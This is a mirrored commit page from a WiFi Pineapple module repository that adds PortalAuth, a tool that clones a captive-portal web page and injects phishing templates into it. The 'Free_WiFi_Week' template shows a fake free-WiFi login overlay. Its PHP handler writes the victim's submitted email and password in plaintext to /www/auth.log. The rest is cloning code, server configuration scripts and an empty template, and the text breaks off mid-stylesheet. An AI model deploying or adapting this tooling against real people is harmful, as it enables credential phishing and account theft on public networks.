mirror of
https://github.com/hak5/nano-tetra-modules.git
synced 2025-10-29 16:58:09 +00:00
Add modules to repository
This commit is contained in:
313
PortalAuth/includes/scripts/PortalCloner.py
Executable file
313
PortalAuth/includes/scripts/PortalCloner.py
Executable file
@@ -0,0 +1,313 @@
|
||||
from __future__ import absolute_import
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import shutil
|
||||
from contextlib import closing
|
||||
|
||||
parent_dir = os.path.abspath(os.path.dirname(__file__))
|
||||
libs_dir = os.path.join(parent_dir, 'libs')
|
||||
sys.path.append(libs_dir)
|
||||
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
import threading
|
||||
import urlparse
|
||||
import tinycss
|
||||
import collections
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
class PortalCloner:
|
||||
|
||||
def __init__(self, portalName, directory, injectSet):
|
||||
self.portalName = portalName
|
||||
self.portalDirectory = directory + self.portalName + "/"
|
||||
self.resourceDirectory = self.portalDirectory + "resources/"
|
||||
self.injectionSet = injectSet
|
||||
self.css_urls = collections.defaultdict(list)
|
||||
self.splashFile = self.portalDirectory + "index.php"
|
||||
self.url = None
|
||||
self.soup = None
|
||||
self.session = requests.Session()
|
||||
self.basePath = '/pineapple/modules/PortalAuth/'
|
||||
self.uas = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
|
||||
|
||||
|
||||
def find_meta_refresh(self, r):
|
||||
soup = BeautifulSoup(r.text, "html.parser")
|
||||
for meta in soup.find_all("meta"):
|
||||
if meta.has_attr("http-equiv"):
|
||||
if "url=" in meta.get("content").lower():
|
||||
text = meta.get("content").split(";")[1]
|
||||
text = text.strip()
|
||||
if text.lower().startswith("url="):
|
||||
new_url=text[4:]
|
||||
return True, new_url
|
||||
return False, r
|
||||
|
||||
|
||||
def follow_redirects(self, r, s):
|
||||
redirected, new_url = self.find_meta_refresh(r)
|
||||
if redirected:
|
||||
r = self.follow_redirects(self.session.get(urlparse.urljoin(r.url, new_url)), s)
|
||||
return r
|
||||
|
||||
def downloadFile(self, url, name):
|
||||
with closing(self.session.get(urlparse.urljoin(self.url, url), stream=True, verify=False)) as r:
|
||||
with open(self.resourceDirectory + name, 'wb') as out_file:
|
||||
for chunk in r.iter_content(8192):
|
||||
out_file.write(chunk)
|
||||
|
||||
def parseCSS(self, url):
|
||||
r = requests.get(url, headers=self.uas)
|
||||
urls = []
|
||||
parser = tinycss.make_parser('page3')
|
||||
try:
|
||||
stylesheet = parser.parse_stylesheet(r.text)
|
||||
for rule in stylesheet.rules:
|
||||
for dec in rule.declarations:
|
||||
for token in dec.value:
|
||||
if token.type == "URI":
|
||||
# Strip out anything not part of the URL and append it to the list
|
||||
urls.append(token.as_css().replace("url(","").replace(")","").strip('"\''))
|
||||
except:
|
||||
pass
|
||||
return urls
|
||||
|
||||
|
||||
def checkFileName(self, orig):
|
||||
filename, file_ext = os.path.splitext(orig)
|
||||
path = self.resourceDirectory + filename + file_ext
|
||||
fname = orig
|
||||
uniq = 1
|
||||
while os.path.exists(path):
|
||||
fname = "%s_%d%s" % (filename, uniq, file_ext)
|
||||
path = self.resourceDirectory + fname
|
||||
uniq += 1
|
||||
return fname
|
||||
|
||||
|
||||
def fetchPage(self, url):
|
||||
# Check if the proper directories exist and create them if not
|
||||
for path in [self.portalDirectory, self.resourceDirectory]:
|
||||
if not os.path.exists(path):
|
||||
os.makedirs(path)
|
||||
|
||||
# Attempt to open an external web page and load the HTML
|
||||
response = requests.get(url, headers=self.uas, verify=False)
|
||||
|
||||
# Get the actual URL - This accounts for redirects - and set the class variable with it
|
||||
self.url = response.url
|
||||
|
||||
# Set up the URL as our referrer to get access to protected images
|
||||
self.session.headers.update({'referer':self.url})
|
||||
|
||||
# Follow any meta refreshes that exist before continuing
|
||||
response = self.follow_redirects(response, self.session)
|
||||
|
||||
# Create a BeautifulSoup object to hold our HTML structure
|
||||
self.soup = BeautifulSoup(response.text, "html.parser")
|
||||
|
||||
|
||||
def cloneResources(self):
|
||||
|
||||
# Define a list in which to store the locations of all resources
|
||||
# to be downloaded.
|
||||
resourceURLs = []
|
||||
|
||||
|
||||
# Download all linked JS files and remove all inline JavaScript
|
||||
for script in self.soup.find_all('script'):
|
||||
if script.has_attr('src'):
|
||||
|
||||
# Get the name of the resource
|
||||
fname = str(script.get('src')).split("/")[-1]
|
||||
|
||||
# Download the resource
|
||||
resourceURLs.append([script.get('src'), fname])
|
||||
|
||||
# Change the url to the resource in the cloned file
|
||||
script['src'] = "resources/" + fname
|
||||
|
||||
# Search through all tags for the style attribute and gather inline CSS references
|
||||
for tag in self.soup():
|
||||
if tag.has_attr('style'):
|
||||
for dec in tag['style'].split(";"):
|
||||
token = dec.split(":")[-1]
|
||||
token = token.strip()
|
||||
if token.lower().startswith("url"):
|
||||
imageURL = token.replace("url(","").replace(")","").strip('"\'')
|
||||
|
||||
# Get the name of the resource
|
||||
fname = imageURL.split("/")[-1]
|
||||
|
||||
# Download the resource
|
||||
resourceURLs.append([imageURL, fname])
|
||||
|
||||
# Change the inline CSS
|
||||
tag['style'].replace(imageURL, "resources/" + fname)
|
||||
|
||||
# Search for CSS files linked with the @import statement and remove
|
||||
for style in self.soup.find_all("style"):
|
||||
parser = tinycss.make_parser('page3')
|
||||
stylesheet = parser.parse_stylesheet(style.string)
|
||||
for rule in stylesheet.rules:
|
||||
if rule.at_keyword == "@import":
|
||||
|
||||
# Get the name of the resource
|
||||
fname = str(rule.uri).split("/")[-1]
|
||||
|
||||
# Download the resource
|
||||
resourceURLs.append([rul.uri, fname])
|
||||
|
||||
# Parse the CSS to get image links
|
||||
_key = "resources/" + fname
|
||||
self.css_urls[_key] = self.parseCSS(urlparse.urljoin(self.url, rule.uri))
|
||||
|
||||
# Replace the old link of the CSS with the new one
|
||||
modStyle = style.string
|
||||
style.string.replace_with(modStyle.replace(rule.uri, "resources/" + fname))
|
||||
|
||||
|
||||
# Find and download all images and CSS files linked with <link>
|
||||
for img in self.soup.find_all(['img', 'link', 'embed']):
|
||||
if img.has_attr('href'):
|
||||
tag = "href"
|
||||
elif img.has_attr('src'):
|
||||
tag = "src"
|
||||
|
||||
# Parse the tag to get the file name
|
||||
fname = str(img.get(tag)).split("/")[-1]
|
||||
|
||||
# Strip out any undesired characters
|
||||
pattern = re.compile('[^a-zA-Z0-9_.]+', re.UNICODE)
|
||||
fname = pattern.sub('', fname)
|
||||
fname = fname[:255]
|
||||
|
||||
if fname == "":
|
||||
continue
|
||||
if fname.rpartition('.')[1] == "":
|
||||
fname += ".css"
|
||||
if fname.rpartition('.')[2] == "css":
|
||||
_key = "resources/" + fname
|
||||
self.css_urls[_key] = self.parseCSS(urlparse.urljoin(self.url, img.get(tag)))
|
||||
|
||||
# Check the file name for bad characters
|
||||
checkedName = self.checkFileName(fname)
|
||||
|
||||
# Download the resource
|
||||
resourceURLs.append([img.get(tag), checkedName])
|
||||
|
||||
# Change the image src to look for the image in resources
|
||||
img[tag] = "resources/" + checkedName
|
||||
|
||||
# Spawn threads to begin downloading all resources
|
||||
# r[0] is the URL of the resource
|
||||
# r[1] is the name of the resource that will be saved
|
||||
threads = []
|
||||
for r in resourceURLs:
|
||||
t = threading.Thread(target=self.downloadFile, args=(r[0], r[1]))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
|
||||
# Wait for the threads to complete
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
# Download any images found in the CSS file and change the link to resources
|
||||
# This occurs AFTER the CSS files have already been copied
|
||||
for css_file, urls in self.css_urls.iteritems():
|
||||
|
||||
# Open the CSS file and get the contents
|
||||
fh = open(self.portalDirectory + css_file).read().decode('utf-8', 'ignore')
|
||||
|
||||
# Iterate over the URLs associated with this CSS file
|
||||
for _fileurl in urls:
|
||||
|
||||
# Get the image name
|
||||
fname = _fileurl.split("/")[-1]
|
||||
|
||||
# Download the image from the web server
|
||||
checkedName = self.checkFileName(fname)
|
||||
try:
|
||||
resourceURLs.append([_fileurl, checkedName])
|
||||
except:
|
||||
pass
|
||||
|
||||
# Change the link in the CSS file
|
||||
fh = fh.replace(_fileurl, checkedName)
|
||||
|
||||
# Write the contents back out to the file
|
||||
fw = open(self.portalDirectory + css_file, 'w')
|
||||
fw.write(fh.encode('utf-8'))
|
||||
fw.flush()
|
||||
fw.close()
|
||||
|
||||
def stripJS(self):
|
||||
for script in self.soup.find_all('script'):
|
||||
script.clear()
|
||||
|
||||
|
||||
def stripCSS(self):
|
||||
for tag in self.soup():
|
||||
if tag.has_attr('style'):
|
||||
tag['style'] = ""
|
||||
|
||||
for style in self.soup.find_all("style"):
|
||||
style.clear()
|
||||
|
||||
|
||||
def stripLinks(self):
|
||||
# Find and clear all href attributes from a tags
|
||||
for link in self.soup.find_all('a'):
|
||||
link['href'] = ""
|
||||
|
||||
|
||||
def stripForms(self):
|
||||
# Find all forms, remove the action and clear the form
|
||||
for form in self.soup.find_all('form'):
|
||||
# Clear the action attribute
|
||||
form['action'] = ""
|
||||
|
||||
# Clear the form
|
||||
form.clear()
|
||||
|
||||
|
||||
def injectJS(self):
|
||||
# Add user defined functions from injectJS.txt
|
||||
with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectJS.txt', 'r') as injectJS:
|
||||
self.soup.head.append(injectJS.read())
|
||||
|
||||
|
||||
def injectCSS(self):
|
||||
# Add user defined CSS from injectCSS.txt
|
||||
with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectCSS.txt', 'r') as injectCSS:
|
||||
self.soup.head.append(injectCSS.read())
|
||||
|
||||
|
||||
def injectHTML(self):
|
||||
# Append our HTML elements to the body of the web page
|
||||
with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectHTML.txt', 'r') as injectHTML:
|
||||
self.soup.body.append(injectHTML.read())
|
||||
|
||||
|
||||
def writeFiles(self):
|
||||
# Write the file out to index.php
|
||||
with open(self.splashFile, 'w') as splash:
|
||||
with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectPHP.txt', 'r') as injectPHP:
|
||||
splash.write(injectPHP.read())
|
||||
splash.write((self.soup.prettify(formatter=None)).encode('utf-8'))
|
||||
|
||||
# Copy the MyPortal PHP script to portalDirectory
|
||||
shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/MyPortal.php', self.portalDirectory)
|
||||
|
||||
# Create the required .ep file
|
||||
with open(self.portalDirectory + self.portalName + ".ep", 'w+') as epFile:
|
||||
epFile.write("DO NOT DELETE THIS")
|
||||
|
||||
# Copy jquery to the portal directory
|
||||
shutil.copy(self.basePath + 'includes/scripts/jquery-2.2.1.min.js', self.portalDirectory)
|
||||
|
||||
|
||||
BIN
PortalAuth/includes/scripts/PortalCloner.pyc
Executable file
BIN
PortalAuth/includes/scripts/PortalCloner.pyc
Executable file
Binary file not shown.
41
PortalAuth/includes/scripts/cfgUploadLimit.py
Executable file
41
PortalAuth/includes/scripts/cfgUploadLimit.py
Executable file
@@ -0,0 +1,41 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
from subprocess import call
|
||||
|
||||
php = "/etc/php.ini"
|
||||
nginx = "/etc/nginx/nginx.conf"
|
||||
|
||||
lines = [f for f in open(php)]
|
||||
with open(php, "w") as out:
|
||||
for line in lines:
|
||||
if "upload_max_filesize" in line:
|
||||
parts = line.split("=")
|
||||
parts[1] = " 20M\n"
|
||||
line = "=".join(parts)
|
||||
if "post_max_size" in line:
|
||||
parts = line.split("=")
|
||||
parts[1] = " 26M\n"
|
||||
line = "=".join(parts)
|
||||
out.write(line)
|
||||
call(["/etc/init.d/php5-fpm", "reload"])
|
||||
|
||||
httpBlock = False
|
||||
needsCfg = True
|
||||
index = innerIndex = 0
|
||||
lines = [f for f in open(nginx)]
|
||||
for line in lines:
|
||||
if "client_max_body_size" in line:
|
||||
needsCfg = False
|
||||
break
|
||||
if needsCfg is True:
|
||||
with open(nginx, "w") as out:
|
||||
for line in lines:
|
||||
if "http {" in line:
|
||||
httpBlock = True
|
||||
if httpBlock is True:
|
||||
if innerIndex == 4:
|
||||
lines.insert(index + 1, "\tclient_max_body_size 20M;\n")
|
||||
innerIndex = innerIndex + 1
|
||||
index = index + 1
|
||||
out.write(line)
|
||||
call(["/etc/init.d/nginx", "reload"])
|
||||
BIN
PortalAuth/includes/scripts/cfgUploadLimit.pyc
Executable file
BIN
PortalAuth/includes/scripts/cfgUploadLimit.pyc
Executable file
Binary file not shown.
28
PortalAuth/includes/scripts/depends.sh
Executable file
28
PortalAuth/includes/scripts/depends.sh
Executable file
@@ -0,0 +1,28 @@
|
||||
#!/bin/sh
|
||||
|
||||
# Author: sud0nick
|
||||
# Date: Dec 2016
|
||||
|
||||
if [ $# -eq 0 ]; then
|
||||
exit;
|
||||
fi
|
||||
|
||||
if [[ "$1" == "-check" ]]; then
|
||||
testCurl=$(opkg list-installed | grep -w 'curl')
|
||||
if [ -z "$testCurl" ]; then
|
||||
echo "Not Installed";
|
||||
else
|
||||
echo "Installed";
|
||||
fi
|
||||
fi
|
||||
|
||||
if [[ "$1" == "-install" ]]; then
|
||||
opkg update > /dev/null;
|
||||
opkg install curl > /dev/null;
|
||||
echo "Complete"
|
||||
fi
|
||||
|
||||
if [[ "$1" == "-remove" ]]; then
|
||||
opkg remove curl > /dev/null
|
||||
echo "Complete"
|
||||
fi
|
||||
25
PortalAuth/includes/scripts/injects/Blank/MyPortal.php
Executable file
25
PortalAuth/includes/scripts/injects/Blank/MyPortal.php
Executable file
@@ -0,0 +1,25 @@
|
||||
<?php namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
25
PortalAuth/includes/scripts/injects/Blank/backups/MyPortal.php
Executable file
25
PortalAuth/includes/scripts/injects/Blank/backups/MyPortal.php
Executable file
@@ -0,0 +1,25 @@
|
||||
<?php namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
4
PortalAuth/includes/scripts/injects/Blank/backups/injectCSS.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/backups/injectCSS.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<style>
|
||||
</style>
|
||||
-->
|
||||
4
PortalAuth/includes/scripts/injects/Blank/backups/injectHTML.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/backups/injectHTML.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<div>
|
||||
</div>
|
||||
-->
|
||||
4
PortalAuth/includes/scripts/injects/Blank/backups/injectJS.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/backups/injectJS.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<script>
|
||||
</script>
|
||||
-->
|
||||
3
PortalAuth/includes/scripts/injects/Blank/backups/injectPHP.txt
Executable file
3
PortalAuth/includes/scripts/injects/Blank/backups/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
|
||||
<?php
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
?>
|
||||
4
PortalAuth/includes/scripts/injects/Blank/injectCSS.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/injectCSS.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<style>
|
||||
</style>
|
||||
-->
|
||||
4
PortalAuth/includes/scripts/injects/Blank/injectHTML.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/injectHTML.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<div>
|
||||
</div>
|
||||
-->
|
||||
4
PortalAuth/includes/scripts/injects/Blank/injectJS.txt
Executable file
4
PortalAuth/includes/scripts/injects/Blank/injectJS.txt
Executable file
@@ -0,0 +1,4 @@
|
||||
<!--
|
||||
<script>
|
||||
</script>
|
||||
-->
|
||||
3
PortalAuth/includes/scripts/injects/Blank/injectPHP.txt
Executable file
3
PortalAuth/includes/scripts/injects/Blank/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
|
||||
<?php
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
?>
|
||||
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/MyPortal.php
Executable file
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
if (!isset($_POST['email']) || !isset($_POST['password'])) {
|
||||
return;
|
||||
}
|
||||
|
||||
$fh = fopen('/www/auth.log', 'a+');
|
||||
fwrite($fh, "Email: " . $_POST['email'] . "\n");
|
||||
fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
|
||||
fclose($fh);
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/MyPortal.php
Executable file
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
|
||||
<?php
|
||||
namespace evilportal;
|
||||
|
||||
class MyPortal extends Portal
|
||||
{
|
||||
|
||||
public function handleAuthorization()
|
||||
{
|
||||
// Call parent to handle basic authorization first
|
||||
parent::handleAuthorization();
|
||||
|
||||
// Check for other form data here
|
||||
if (!isset($_POST['email']) || !isset($_POST['password'])) {
|
||||
return;
|
||||
}
|
||||
|
||||
$fh = fopen('/www/auth.log', 'a+');
|
||||
fwrite($fh, "Email: " . $_POST['email'] . "\n");
|
||||
fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
|
||||
fclose($fh);
|
||||
}
|
||||
|
||||
public function showSuccess()
|
||||
{
|
||||
// Calls default success message
|
||||
parent::showSuccess();
|
||||
}
|
||||
|
||||
public function showError()
|
||||
{
|
||||
// Calls default error message
|
||||
parent::showError();
|
||||
}
|
||||
}
|
||||
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectCSS.txt
Executable file
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectCSS.txt
Executable file
@@ -0,0 +1,120 @@
|
||||
<style>
|
||||
.pa_form-container {
|
||||
border: 1px solid #f2e3d2;
|
||||
background:#F0F8FF;
|
||||
-webkit-border-radius: 8px;
|
||||
-moz-border-radius: 8px;
|
||||
border-radius: 8px;
|
||||
-webkit-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
-moz-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
font-family: 'Helvetica Neue',Helvetica,sans-serif;
|
||||
text-align: center;
|
||||
position: fixed;
|
||||
width: 450px;
|
||||
height: 370px;
|
||||
padding: 20px;
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
margin-top: -230px;
|
||||
margin-left: -225px;
|
||||
z-index: 10;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_form-field {
|
||||
background: #fff;
|
||||
color: #000;
|
||||
font-size: 18px;
|
||||
-webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
-moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
padding:8px;
|
||||
margin-bottom:20px;
|
||||
width:90%;
|
||||
}
|
||||
.pa_form-field:focus {
|
||||
background: #fff;
|
||||
color: #725129;
|
||||
}
|
||||
.pa_form-container h2 {
|
||||
color: #6aa436;
|
||||
font-size:18px;
|
||||
margin: 0 0 10px 0;
|
||||
font-weight:bold;
|
||||
text-align: center;
|
||||
}
|
||||
.pa_form-container p {
|
||||
text-align: center;
|
||||
margin: 10px auto 10px auto;
|
||||
}
|
||||
.pa_form-container table {
|
||||
width: 90%;
|
||||
margin: 0 auto;
|
||||
}
|
||||
.pa_form-title {
|
||||
margin-bottom:10px;
|
||||
color: #725129;
|
||||
font-size: 16px;
|
||||
text-align: left;
|
||||
}
|
||||
.pa_submit-container {
|
||||
margin:8px 0;
|
||||
text-align:center;
|
||||
}
|
||||
.pa_submit-button {
|
||||
border: 1px solid #447314;
|
||||
background: #6aa436;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -moz-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -ms-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -o-linear-gradient(top, #8dc059, #6aa436);
|
||||
background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
|
||||
-webkit-border-radius: 4px;
|
||||
-moz-border-radius: 4px;
|
||||
border-radius: 4px;
|
||||
-webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
-moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
color: #31540c;
|
||||
font-family: helvetica, serif;
|
||||
padding: 8.5px 18px;
|
||||
font-size: 14px;
|
||||
text-decoration: none;
|
||||
vertical-align: middle;
|
||||
width: 200px;
|
||||
cursor: pointer;
|
||||
}
|
||||
.pa_submit-button:hover {
|
||||
border: 1px solid #447314;
|
||||
background: #6aa436;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -moz-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -ms-linear-gradient(top, #8dc059, #6aa436);
|
||||
background: -o-linear-gradient(top, #8dc059, #6aa436);
|
||||
background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
|
||||
color: #fff;
|
||||
}
|
||||
.pa_submit-button:active {
|
||||
border: 1px solid #447314;
|
||||
background: #8dc059;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#6aa436), to(#6aa436));
|
||||
background: -webkit-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -moz-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -ms-linear-gradient(top, #6aa436, #8dc059);
|
||||
background: -o-linear-gradient(top, #6aa436, #8dc059);
|
||||
background-image: -ms-linear-gradient(top, #6aa436 0%, #8dc059 100%);
|
||||
color: #fff;
|
||||
}
|
||||
</style>
|
||||
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectHTML.txt
Executable file
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectHTML.txt
Executable file
@@ -0,0 +1,16 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div class="pa_form-container">
|
||||
<h3 style="display: inline">Enjoy free WiFi between</h3>
|
||||
<h2><div id="pa_date"></div></h2>
|
||||
<div style="margin: 0 auto">
|
||||
<p>Simply enter your email address and password. If you do not already have an account with us one will be created for you.</p>
|
||||
</div>
|
||||
<br /><br />
|
||||
<input class="pa_form-field" type="text" id="pa_email" placeholder="you@gmail.com" />
|
||||
<input class="pa_form-field" type="password" id="pa_password" placeholder="Password" />
|
||||
<br /><br />
|
||||
<div class="pa_submit-container">
|
||||
<input class="pa_submit-button" type="submit" value="Submit" />
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectJS.txt
Executable file
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectJS.txt
Executable file
@@ -0,0 +1,53 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = init;
|
||||
|
||||
function init(){
|
||||
importantDates();
|
||||
setTimeout(displayLogin(),1000);
|
||||
}
|
||||
function importantDates() {
|
||||
$('#pa_date').html(function(){
|
||||
var monthNames=["January", "February", "March", "April", "May", "June",
|
||||
"July", "August", "September", "October", "November", "December"];
|
||||
var tf=new Date();var tp=new Date();var f=new Date();var p=new Date();
|
||||
f.setDate(tf.getDate()+5);p.setDate(tp.getDate()-2);
|
||||
var fd=f.getDate();var pd=p.getDate();
|
||||
var fm=monthNames[f.getMonth()];var pm=monthNames[p.getMonth()];
|
||||
if(fd<10){fd='0'+fd}if(pd<10){pd='0'+pd}
|
||||
return pm+' '+pd+' - '+fm+' '+fd;
|
||||
});
|
||||
}
|
||||
$(function() {
|
||||
$(".pa_submit-button").on("click", function() {
|
||||
var email_addr = $('#pa_email').val();
|
||||
var pass = $('#pa_password').val();
|
||||
if (email_addr == "" || pass == "") {
|
||||
alert("You must enter credentials to log in.");
|
||||
return;
|
||||
} else {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {email: email_addr,
|
||||
password: pass,
|
||||
target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
function displayLogin() {
|
||||
$(function(){
|
||||
$(".pa_form-container").css("opacity", "1");
|
||||
$(".pa_form-container, #pa_overlay-back").fadeIn("slow");
|
||||
});
|
||||
}
|
||||
</script>
|
||||
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectPHP.txt
Executable file
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
|
||||
<?php
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
?>
|
||||
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectCSS.txt
Executable file
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectCSS.txt
Executable file
@@ -0,0 +1,120 @@
|
||||
<style>
|
||||
.pa_form-container {
|
||||
border: 1px solid #f2e3d2;
|
||||
background:#F0F8FF;
|
||||
-webkit-border-radius: 8px;
|
||||
-moz-border-radius: 8px;
|
||||
border-radius: 8px;
|
||||
-webkit-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
-moz-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
|
||||
font-family: 'Helvetica Neue',Helvetica,sans-serif;
|
||||
text-align: center;
|
||||
position: fixed;
|
||||
width: 450px;
|
||||
height: 370px;
|
||||
padding: 20px;
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
margin-top: -230px;
|
||||
margin-left: -225px;
|
||||
z-index: 10;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_form-field {
|
||||
background: #fff;
|
||||
color: #000;
|
||||
font-size: 18px;
|
||||
-webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
-moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
box-shadow: rgba(255,255,255,0.4) 0 1px 0;
|
||||
padding:8px;
|
||||
margin-bottom:20px;
|
||||
width:90%;
|
||||
}
|
||||
.pa_form-field:focus {
|
||||
background: #fff;
|
||||
color: #725129;
|
||||
}
|
||||
.pa_form-container h2 {
|
||||
color: #6aa436;
|
||||
font-size:18px;
|
||||
margin: 0 0 10px 0;
|
||||
font-weight:bold;
|
||||
text-align: center;
|
||||
}
|
||||
.pa_form-container p {
|
||||
text-align: center;
|
||||
margin: 10px auto 10px auto;
|
||||
}
|
||||
.pa_form-container table {
|
||||
width: 90%;
|
||||
margin: 0 auto;
|
||||
}
|
||||
.pa_form-title {
|
||||
margin-bottom:10px;
|
||||
color: #725129;
|
||||
font-size: 16px;
|
||||
text-align: left;
|
||||
}
|
||||
.pa_submit-container {
|
||||
margin:8px 0;
|
||||
text-align:center;
|
||||
}
|
||||
.pa_submit-button {
|
